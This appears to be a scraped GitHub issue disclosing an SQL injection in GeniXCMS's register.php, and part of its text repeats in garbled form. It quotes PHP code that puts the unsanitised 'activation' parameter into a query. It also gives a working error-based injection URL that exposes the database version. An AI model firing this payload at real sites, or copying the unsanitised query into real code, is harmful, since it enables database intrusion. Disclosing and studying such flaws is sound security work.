if (isset($_GET['activation'])) {
# code...
$usr = Db::result(sprintf("SELECT * FROM `user` WHERE `activation` = '%s' LIMIT 1", $_GET['activation'] ));
the activation param leads to sql injection vulnerability
POC:
http://127.0.0.1/GeniXCMS/register.php?activation=1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)%23
We'll find that the database version in the response page, which proved the vulnerability exist.
By the way, if you can help me apply for a CVE-ID, i will be very grateful.XD
The text was updated successfully, but these errors were encountered:
/register.php
the
activationparam leads to sql injection vulnerabilityPOC:
We'll find that the database version in the response page, which proved the vulnerability exist.
By the way, if you can help me apply for a CVE-ID, i will be very grateful.XD
The text was updated successfully, but these errors were encountered: